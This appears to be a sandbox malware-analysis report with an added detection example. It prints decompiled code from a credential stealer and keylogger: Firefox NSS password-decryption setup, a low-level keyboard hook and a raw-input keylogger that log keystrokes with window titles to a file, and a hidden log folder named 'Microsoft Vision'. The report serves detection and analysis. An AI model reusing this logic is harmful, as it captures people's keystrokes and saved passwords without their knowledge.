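E0040ADE3 prepares Firefox credential decryption the way a stealer does it: it changes into the Firefox install directory passed in `_a4`, probes for the MSVC runtime variant that build ships (msvcp/msvcr 90 through 140 in steps of 10), loads msvcr120, msvcp120, mozglue, nss3 and softokn3 with LoadLibraryW, and resolves NSS_Init, PK11_GetInternalKeySlot, PK11_Authenticate, PK11SDR_Decrypt, NSSBase64_DecodeBuffer, PK11_CheckUserPassword, NSS_Shutdown, PK11_FreeSlot and PR_GetError into the object at `__ecx`, the standard set for decrypting a profile's stored logins through its key database. The observable on an endpoint is a process that is not Firefox loading nss3.dll, softokn3.dll and mozglue.dll from the Firefox directory rather than from its own. The Python below is an added example, not report output and not the sample's code; it evaluates constructed image-load events (the field names and the dropped-file name are assumptions) and flags exactly that combination.

```python
import ntpath

# Constructed image-load events (Sysmon event 7 style), not from the sandbox trace.
# pid 4120 is Firefox itself, pid 5508 plays the role of E0040ADE3 running inside a
# dropped executable, pid 6100 is an unrelated control case.
FIREFOX_DIR = r"C:\Program Files\Mozilla Firefox"
DROPPER = r"C:\Users\user\AppData\Roaming\images.exe"  # placeholder name for the example
SAMPLE_IMAGE_LOADS = [
    {"pid": 4120, "image": FIREFOX_DIR + r"\firefox.exe", "module": FIREFOX_DIR + r"\nss3.dll"},
    {"pid": 4120, "image": FIREFOX_DIR + r"\firefox.exe", "module": FIREFOX_DIR + r"\softokn3.dll"},
    {"pid": 4120, "image": FIREFOX_DIR + r"\firefox.exe", "module": FIREFOX_DIR + r"\mozglue.dll"},
    {"pid": 5508, "image": DROPPER, "module": FIREFOX_DIR + r"\msvcr120.dll"},
    {"pid": 5508, "image": DROPPER, "module": FIREFOX_DIR + r"\msvcp120.dll"},
    {"pid": 5508, "image": DROPPER, "module": FIREFOX_DIR + r"\mozglue.dll"},
    {"pid": 5508, "image": DROPPER, "module": FIREFOX_DIR + r"\nss3.dll"},
    {"pid": 5508, "image": DROPPER, "module": FIREFOX_DIR + r"\softokn3.dll"},
    {"pid": 6100, "image": r"C:\Windows\System32\svchost.exe", "module": r"C:\Windows\System32\winmm.dll"},
]

# The libraries PK11SDR_Decrypt needs at runtime; the same set E0040ADE3 loads.
NSS_SET = {"nss3.dll", "softokn3.dll", "mozglue.dll"}


def nss_foreign_loaders(events, required=NSS_SET):
    """Group image loads by pid and report every process that loaded the full NSS set
    from a directory other than the one its own executable lives in."""
    procs = {}
    for ev in events:
        rec = procs.setdefault(ev["pid"], {"image": ev["image"], "mods": {}})
        rec["mods"][ntpath.basename(ev["module"]).lower()] = ntpath.dirname(ev["module"]).lower()
    hits = []
    for pid, rec in procs.items():
        mods = rec["mods"]
        if not required.issubset(mods):
            continue
        own_dir = ntpath.dirname(rec["image"]).lower()
        # Firefox (and anything that ships NSS beside its own exe) loads from own_dir;
        # a stealer that chdir'd into the Firefox folder does not.
        foreign = sorted({mods[m] for m in required if mods[m] != own_dir})
        if foreign:
            hits.append({"pid": pid, "image": rec["image"], "loaded_from": foreign})
    return hits


if __name__ == "__main__":
    for hit in nss_foreign_loaders(SAMPLE_IMAGE_LOADS):
        print(f"pid {hit['pid']}: {hit['image']} loaded NSS from {', '.join(hit['loaded_from'])}")
```

Keying the rule on "NSS loaded from a directory other than the loader's own" avoids an allowlist of browser process names, which a renamed sample defeats; Firefox and applications that bundle NSS beside their own executable stay silent without being enumerated.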
                                  Statement addresses for this function: 0x0040ade3 to 0x0040b10b

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                  • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                  • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                  • API String ID: 410702425-850564384
                                  • Opcode ID: cc16af515c41c402457062f36a950968025c5ea39f63b00c017cce32ba82f595
                                  • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                  • Opcode Fuzzy Hash: cc16af515c41c402457062f36a950968025c5ea39f63b00c017cce32ba82f595
                                  • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040813A(signed int __ecx, int __edx, long _a4) {
                                  				signed int _v8;
                                  				int _v12;
                                  				short _v24;
                                  				short _v56;
                                  				void* _t21;
                                  				short _t24;
                                  				short _t27;
                                  				void* _t36;
                                  				int _t46;
                                  				signed int _t48;
                                  				WCHAR* _t49;
                                  				WCHAR* _t50;
                                  				long _t57;
                                  				void* _t58;
                                  				short _t59;
                                  				short _t60;
                                  				short _t62;
                                  				short _t63;
                                  				short _t64;
                                  				short _t66;
                                  				short _t67;
                                  				short _t69;
                                  				short _t70;
                                  				short _t71;
                                  				short _t73;
                                  				short _t75;
                                  				short _t77;
                                  				short _t78;
                                  				short _t79;
                                  				signed int _t81;
                                  
                                  				_t55 = __edx;                         // hook message: WM_KEYDOWN (0x100) or WM_SYSKEYDOWN (0x104) from the WH_KEYBOARD_LL callback
                                  				_t48 = __ecx;
                                  				_t46 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				_t57 = _a4;                           // KBDLLHOOKSTRUCT*: +0 vkCode, +4 scanCode, +8 flags
                                  				_t21 = __edx - 0x100;
                                  				if(_t21 == 0 || _t21 == 4) {          // key-down events only; key-up is ignored
                                  					_t58 =  *_t57;                    // virtual-key code, mapped to text below; GetAsyncKeyState(VK_SHIFT) selects the shifted glyph
                                  					if(_t58 < 0x27) {
                                  						__eflags = _t58 - 0x40;
                                  						if(_t58 <= 0x40) {
                                  							L21:
                                  							__eflags = _t58 - 0x66;
                                  							if(__eflags > 0) {
                                  								__eflags = _t58 - 0xbc;
                                  								if(__eflags > 0) {
                                  									__eflags = _t58 - 0xdb;
                                  									if(__eflags > 0) {
                                  										_t59 = _t58 - 0xdc;
                                  										__eflags = _t59;
                                  										if(_t59 == 0) {
                                  											_t24 = GetAsyncKeyState(0x10);    // VK_SHIFT held?
                                  											_t49 = "|";                       // 0xdc = VK_OEM_5: '|' shifted, '\' unshifted
                                  											__eflags = _t24;
                                  											if(__eflags == 0) {
                                  												_t49 = "\\";
                                  											}
                                  											L99:
                                  											E004085CB(_t49, _t55, _t90);
                                  											goto L100;
                                  										}
                                  										_t60 = _t59 - 1;
                                  										__eflags = _t60;
                                  										if(_t60 == 0) {
                                  											_t27 = GetAsyncKeyState(0x10);
                                  											_t50 = "}";
                                  											_t55 = "]";
                                  											L76:
                                  											__eflags = _t27;
                                  											_t49 =  ==  ? _t55 : _t50;
                                  											goto L99;
                                  										}
                                  										__eflags = _t60 - 1;
                                  										if(__eflags == 0) {
                                  											_t27 = GetAsyncKeyState(0x10);
                                  											_t50 = "\"";
                                  											_t55 = "\'";
                                  											goto L76;
                                  										}
                                  										L94:
                                  										// Keys without a literal above: build GetKeyNameTextW's lParam from the hook data (scanCode in bits 16-23, LLKHF_EXTENDED in bit 24) and log the key name instead
                                  										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                  										_t49 =  &_v56;
                                  										goto L99;
                                  									}
                                  									if(__eflags == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "{";
                                  										_t55 = "[";
                                  										goto L76;
                                  									}
                                  									_t62 = _t58 - 0xbd;
                                  									__eflags = _t62;
                                  									if(_t62 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "_";
                                  										_t55 = "-";
                                  										goto L76;
                                  									}
                                  									_t63 = _t62 - 1;
                                  									__eflags = _t63;
                                  									if(_t63 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = ">";
                                  										_t55 = ".";
                                  										goto L76;
                                  									}
                                  									_t64 = _t63 - 1;
                                  									__eflags = _t64;
                                  									if(_t64 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "?";
                                  										_t55 = "/";
                                  										goto L76;
                                  									}
                                  									__eflags = _t64 - 1;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "~";
                                  									_t55 = "`";
                                  									goto L76;
                                  								}
                                  								if(__eflags == 0) {
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "<";
                                  									_t55 = ",";
                                  									goto L76;
                                  								}
                                  								__eflags = _t58 - 0xa3;
                                  								if(_t58 > 0xa3) {
                                  									__eflags = _t58 - 0xa5;
                                  									if(__eflags <= 0) {
                                  										L78:
                                  										_t49 = L"[ALT]";                  // 0xa4/0xa5 = VK_LMENU/VK_RMENU
                                  										goto L99;
                                  									}
                                  									__eflags = _t58 - 0xba;
                                  									if(_t58 == 0xba) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = ":";
                                  										_t55 = ";";
                                  										goto L76;
                                  									}
                                  									__eflags = _t58 - 0xbb;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "+";
                                  									_t55 = "=";
                                  									goto L76;
                                  								}
                                  								__eflags = _t58 - 0xa2;
                                  								if(__eflags >= 0) {
                                  									L71:
                                  									_t49 = L"[CTRL]";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x67;
                                  								if(__eflags == 0) {
                                  									_t49 = "7";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x68;
                                  								if(__eflags == 0) {
                                  									_t49 = "8";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x69;
                                  								if(__eflags == 0) {
                                  									_t49 = "9";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0xa0 - 1;
                                  								if(__eflags > 0) {
                                  									goto L94;
                                  								}
                                  								goto L100;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t49 = "6";
                                  								goto L99;
                                  							}
                                  							__eflags = _t58 - 0x20;
                                  							if(__eflags > 0) {
                                  								__eflags = _t58 - 0x62;
                                  								if(__eflags > 0) {
                                  									_t66 = _t58 - 0x63;
                                  									__eflags = _t66;
                                  									if(__eflags == 0) {
                                  										_t49 = "3";
                                  										goto L99;
                                  									}
                                  									_t67 = _t66 - 1;
                                  									__eflags = _t67;
                                  									if(__eflags == 0) {
                                  										_t49 = "4";
                                  										goto L99;
                                  									}
                                  									__eflags = _t67 - 1;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t49 = "5";
                                  									goto L99;
                                  								}
                                  								if(__eflags == 0) {
                                  									_t49 = "2";
                                  									goto L99;
                                  								}
                                  								_t69 = _t58 - 0x2d;
                                  								__eflags = _t69;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[INSERT]";
                                  									goto L99;
                                  								}
                                  								_t70 = _t69 - 1;
                                  								__eflags = _t70;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[DEL]";
                                  									goto L99;
                                  								}
                                  								_t71 = _t70 - 0x32;
                                  								__eflags = _t71;
                                  								if(__eflags == 0) {
                                  									_t49 = "0";
                                  									goto L99;
                                  								}
                                  								__eflags = _t71 - 1;
                                  								if(__eflags != 0) {
                                  									goto L94;
                                  								}
                                  								_t49 = "1";
                                  								goto L99;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t49 = " ";
                                  								goto L99;
                                  							}
                                  							__eflags = _t58 - 0x11;
                                  							if(__eflags > 0) {
                                  								_t73 = _t58 - 0x12;
                                  								__eflags = _t73;
                                  								if(__eflags == 0) {
                                  									goto L78;
                                  								}
                                  								_t75 = _t73;
                                  								__eflags = _t75;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[CAPS]";
                                  									goto L99;
                                  								}
                                  								__eflags = _t75 - 7;
                                  								if(__eflags != 0) {
                                  									goto L94;
                                  								}
                                  								_t49 = L"[ESC]";
                                  								goto L99;
                                  							}
                                  							if(__eflags == 0) {
                                  								goto L71;
                                  							}
                                  							_t77 = _t58 - 8;
                                  							__eflags = _t77;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[BKSP]";
                                  								goto L99;
                                  							}
                                  							_t78 = _t77 - 1;
                                  							__eflags = _t78;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[TAB]";
                                  								goto L99;
                                  							}
                                  							_t79 = _t78 - 4;
                                  							__eflags = _t79;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[ENTER]\r\n";
                                  								goto L99;
                                  							}
                                  							__eflags = _t79 - 3;
                                  							if(__eflags == 0) {
                                  								goto L100;
                                  							}
                                  							goto L94;
                                  						}
                                  						L19:
                                  						__eflags = _t58 - 0x5b;
                                  						if(_t58 >= 0x5b) {
                                  							goto L21;
                                  						}
                                  						_t36 = E004085C0();
                                  						__eflags = GetAsyncKeyState(0x10);
                                  						__eflags = E004085AE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                  						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                  						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                  						E004085CB( &_v24, _t36, __eflags);
                                  						_t46 = _v8;
                                  						goto L100;
                                  					}
                                  					if(_t58 > 0x40) {
                                  						goto L19;
                                  					}
                                  					if(GetAsyncKeyState(0x10) == 0) {
                                  						wsprintfW( &_v24, L"%c", _t58);
                                  						_t49 =  &_v24;
                                  						goto L99;
                                  					}
                                  					_t81 = _t58 + 0xffffffd0;
                                  					_t90 = _t81 - 9;
                                  					if(_t81 > 9) {
                                  						goto L100;
                                  					}
                                  					switch( *((intOrPtr*)(_t81 * 4 +  &M00408586))) {
                                  						case 0:
                                  							_t49 = ")";
                                  							goto L99;
                                  						case 1:
                                  							__ecx = "!";
                                  							goto L99;
                                  						case 2:
                                  							__ecx = "@";
                                  							goto L99;
                                  						case 3:
                                  							__ecx = "#";
                                  							goto L99;
                                  						case 4:
                                  							__ecx = "$";
                                  							goto L99;
                                  						case 5:
                                  							__ecx = "%";
                                  							goto L99;
                                  						case 6:
                                  							__ecx = "^";
                                  							goto L99;
                                  						case 7:
                                  							__ecx = "&";
                                  							goto L99;
                                  						case 8:
                                  							__ecx = "*";
                                  							goto L99;
                                  						case 9:
                                  							__ecx = "(";
                                  							goto L99;
                                  					}
                                  				} else {
                                  					L100:
                                  					return CallNextHookEx(0, _t46, _v12, _t57);
                                  				}
                                  			}

                                  APIs
                                  • GetAsyncKeyState.USER32 ref: 00408176
                                  • CallNextHookEx.USER32 ref: 00408577
                                    • Part of subcall function 004085CB: GetForegroundWindow.USER32 ref: 004085F4
                                    • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                    • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                    • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                  • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                  • API String ID: 2452648998-4143582258
                                  • Opcode ID: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction ID: 005c92b7aa13bd5785e0d60a0273475475fd8f33417f3dbf942b8c71a30de329
                                  • Opcode Fuzzy Hash: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction Fuzzy Hash: 0791C132A4C910ABCB1892288F586BA2531A7917A4F10C17FD9C3B77D1DF7C9E82524F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00408793(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				char _v524;
                                  				short _v564;
                                  				intOrPtr _v568;
                                  				short _v570;
                                  				short _v572;
                                  				long _v596;
                                  				char _v600;
                                  				int _v604;
                                  				char _v612;
                                  				intOrPtr _v616;
                                  				struct _OVERLAPPED* _v620;
                                  				char _v624;
                                  				char _v628;
                                  				void* _v632;
                                  				char _v636;
                                  				intOrPtr _v640;
                                  				struct _OVERLAPPED* _v644;
                                  				char _v648;
                                  				void* _t76;
                                  				short _t77;
                                  				void* _t82;
                                  				char* _t84;
                                  				struct _OVERLAPPED** _t86;
                                  				long _t88;
                                  				intOrPtr _t93;
                                  				intOrPtr* _t96;
                                  				long _t100;
                                  				intOrPtr _t101;
                                  				WCHAR* _t102;
                                  				intOrPtr _t104;
                                  				void* _t105;
                                  				long _t109;
                                  				void* _t110;
                                  				intOrPtr _t111;
                                  				intOrPtr _t113;
                                  				long _t116;
                                  				intOrPtr _t117;
                                  				intOrPtr _t119;
                                  				long _t121;
                                  				intOrPtr _t122;
                                  				intOrPtr _t124;
                                  				void* _t126;
                                  				intOrPtr _t128;
                                  				intOrPtr _t130;
                                  				long _t132;
                                  				intOrPtr _t133;
                                  				intOrPtr _t135;
                                  				DWORD* _t136;
                                  				long _t137;
                                  				intOrPtr _t138;
                                  				long _t142;
                                  				void* _t152;
                                  				long _t164;
                                  				intOrPtr _t178;
                                  				intOrPtr _t189;
                                  				void* _t195;
                                  				struct _OVERLAPPED* _t198;
                                  				struct _OVERLAPPED* _t201;
                                  				void* _t204;
                                  				void* _t206;
                                  				void* _t208;
                                  				signed int _t209;
                                  				void* _t212;
                                  				void* _t213;
                                  
                                  				_t198 = 0;
                                  				_v600 = 0;
                                  				E00401052( &_v524, 0, 0x208);
                                  				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                  				_t201 = 0;
                                  				_v604 = 0;
                                  				_t76 = _a8 - 1;
                                  				if(_t76 == 0) {
                                  					_t77 = 6;
                                  					_v570 = _t77;
                                  					__eflags = 1;
                                  					_v564 = _a4;
                                  					_v568 = 0x130;
                                  					_v572 = 1;
                                  					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                  				} else {
                                  					_t82 = _t76 - 0xf;
                                  					if(_t82 == 0) {
                                  						PostQuitMessage(0);
                                  					} else {
                                  						if(_t82 == 0xef) {
                                  							_t84 =  &_v600;
                                  							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                  							__eflags = _t84 - 0xffffffff;
                                  							if(_t84 != 0xffffffff) {
                                  								_t164 = E00406099(_v620);
                                  								_v596 = _t164;
                                  								__eflags = _t164;
                                  								if(_t164 != 0) {
                                  									_t86 =  &_v620;
                                  									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                  									__eflags = _t86 - _v640;
                                  									if(_t86 == _v640) {
                                  										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                  										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                  											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                  											__eflags = _t88;
                                  											if(_t88 <= 0) {
                                  												E00403411( &_v644, _t195, L"Unknow");
                                  											} else {
                                  												E00403549( &_v648, E004036F7( &_v636,  &_v564));
                                  												E00405FEB(_v644);
                                  											}
                                  											E00408C13( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                  											E00403549( &_v632,  &_v644);
                                  											_t93 =  *0x42675c; // 0x0
                                  											E0040357C( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                  											_t96 =  *0x42675c; // 0x0
                                  											__eflags =  *_t96 - _t198;
                                  											if( *_t96 != _t198) {
                                  												_t213 = _t212 - 0x10;
                                  												__eflags = _t96 + 0xa18;
                                  												E004013B3(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                  												_t208 = _t213 - 0x10;
                                  												E0040373F(_t208,  &_v636);
                                  												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                  												 *((short*)(_t208 + 8)) = _v632;
                                  												E0040373F(_t208 + 0xc,  &_v628);
                                  												_t152 = E00404A78( &_v612, __eflags);
                                  												_t189 =  *0x42675c; // 0x0
                                  												E00405044( *((intOrPtr*)(_t189 + 0xa50)), _t152);
                                  												E00404A4E( &_v648);
                                  												_t96 =  *0x42675c; // 0x0
                                  											}
                                  											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                  											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                  												_t100 = lstrlenW(_t96 + 0x210);
                                  												__eflags = _t100;
                                  												_t101 =  *0x42675c; // 0x0
                                  												if(_t100 == 0) {
                                  													L17:
                                  													_t102 = _t101 + 0x210;
                                  													__eflags = _t102;
                                  													lstrcpyW(_t102, _v632);
                                  													_t104 =  *0x42675c; // 0x0
                                  													 *(_t104 + 0xa10) = _t198;
                                  												} else {
                                  													_t142 = E0040335A( &_v648, E004036F7( &_v636, _t101 + 0x210));
                                  													E00405FEB(_v644);
                                  													_t101 =  *0x42675c; // 0x0
                                  													_v644 = _t198;
                                  													__eflags = _t142;
                                  													if(_t142 == 0) {
                                  														goto L17;
                                  													} else {
                                  														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                  													}
                                  												}
                                  												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
                                  												_t178 =  *0x42675c; // 0x0
                                  												 *(_t178 + 4) = _t105;
                                  												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                  												if(__eflags == 0) {
                                  													_t49 = _t178 + 8; // 0x8
                                  													_t204 = L"\r\n";
                                  													_t116 = lstrlenW(_t204);
                                  													_t117 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
                                  													_t119 =  *0x42675c; // 0x0
                                  													_t121 = lstrlenW(_t204);
                                  													_t122 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
                                  													_t124 =  *0x42675c; // 0x0
                                  													_t126 = E00403373( &_v632);
                                  													_t128 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
                                  													_t130 =  *0x42675c; // 0x0
                                  													_t206 = L"\r\n";
                                  													_t132 = lstrlenW(_t206);
                                  													_t133 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
                                  													_t135 =  *0x42675c; // 0x0
                                  													_t136 = _t135 + 8;
                                  													__eflags = _t136;
                                  													_t137 = lstrlenW(_t206);
                                  													_t138 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
                                  													_t178 =  *0x42675c; // 0x0
                                  												}
                                  												_t58 = _t178 + 8; // 0x8
                                  												_t109 = lstrlenW(E00408B2D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                  												__eflags = _t109;
                                  												_t110 = E00408B2D( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                  												_t111 =  *0x42675c; // 0x0
                                  												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
                                  												_t113 =  *0x42675c; // 0x0
                                  												CloseHandle( *(_t113 + 4));
                                  											}
                                  											E00405FEB(_v620);
                                  											_v620 = _t198;
                                  											E00405FEB(_v632);
                                  											_t201 = _v644;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_t201);
                                  				return _t198;
			}

                                  APIs
                                  • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                  • GetForegroundWindow.USER32 ref: 00408859
                                  • GetWindowTextW.USER32 ref: 0040886A
                                  • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                  • PostQuitMessage.USER32 ref: 00408AE6
                                  • RegisterRawInputDevices.USER32 ref: 00408B15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                  • String ID: Unknow
                                  • API String ID: 3853268301-1240069140
                                  • Opcode ID: 25c54a7e746581c659a04ab4f6f35b0600ec8f05a5dfc5433c8a338663c3b571
                                  • Instruction ID: 458c7b85aa02a6c7404881c9d8865e4587a04225f5986bfff7961e81c5bb117e
                                  • Opcode Fuzzy Hash: 25c54a7e746581c659a04ab4f6f35b0600ec8f05a5dfc5433c8a338663c3b571
                                  • Instruction Fuzzy Hash: BEA18E71204200AFC710EF65DC89EAB7BB8EF84344F44857EF985A72A1DB35D905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00408D0F(void* __ecx, void* __eflags, void* _a4) {
                                  				short _v544;
                                  				char _v696;
                                  				short _v704;
                                  				char _v724;
                                  				struct tagMSG _v748;
                                  				struct _WNDCLASSW _v788;
                                  				struct _SYSTEMTIME _v804;
                                  				char _v808;
                                  				void* _v812;
                                  				long _v816;
                                  				intOrPtr _t46;
                                  				intOrPtr _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				intOrPtr _t57;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				struct HWND__* _t69;
                                  				int _t73;
                                  				intOrPtr _t94;
                                  				void* _t95;
                                  				intOrPtr _t99;
                                  				void* _t107;
                                  				void* _t110;
                                  				struct HINSTANCE__* _t111;
                                  				struct HWND__* _t112;
                                  				void* _t114;
                                  				signed int _t119;
                                  				intOrPtr _t122;
                                  				intOrPtr _t125;
                                  				intOrPtr _t129;
                                  				intOrPtr _t131;
                                  				void* _t132;
                                  				void* _t133;
                                  				void* _t140;
                                  				signed int _t143;
                                  				signed int _t144;
                                  				signed int _t146;
                                  				void* _t150;
                                  
                                  				_t114 = __ecx;
                                  				_t111 = GetModuleHandleA(0);
                                  				_v788.hIcon = 0;
                                  				_v804.wSecond = 0;
                                  				asm("xorps xmm0, xmm0");
                                  				asm("stosd");
                                  				asm("movlpd [esp+0x30], xmm0");
                                  				asm("movlpd [esp+0x3c], xmm0");
                                  				asm("stosd");
                                  				asm("movlpd [esp+0x44], xmm0");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t46 =  *0x42675c; // 0x0
                                  				E00401052(_t46 + 0x210, 0, 0x800);
                                  				_t49 =  *0x42675c; // 0x0
                                  				E00401052(_t49 + 0x10, 0, 0x208);
                                  				_t52 =  *0x42675c; // 0x0
                                  				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
                                  				_t54 =  *0x42675c; // 0x0
                                  				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
                                  				_t57 =  *0x42675c; // 0x0
                                  				CreateDirectoryW(_t57 + 0x10, 0);
                                  				_t60 =  *0x42675c; // 0x0
                                  				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
                                  				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
                                  					E00401052( &_v544, 0, 0x208);
                                  					_t99 =  *0x42675c; // 0x0
                                  					_t150 = _t150 + 0xc;
                                  					lstrcpyW( &_v544, _t99 + 0x10);
                                  					lstrcatW( &_v544, "*");
                                  					E004036F7(_t150,  &_v544);
                                  					_t107 = E00411446( &_v724, _t153, _t114);
                                  					_t129 =  *0x42675c; // 0x0
                                  					E00401FB7(_t129 + 0xa18, _t153, _t107);
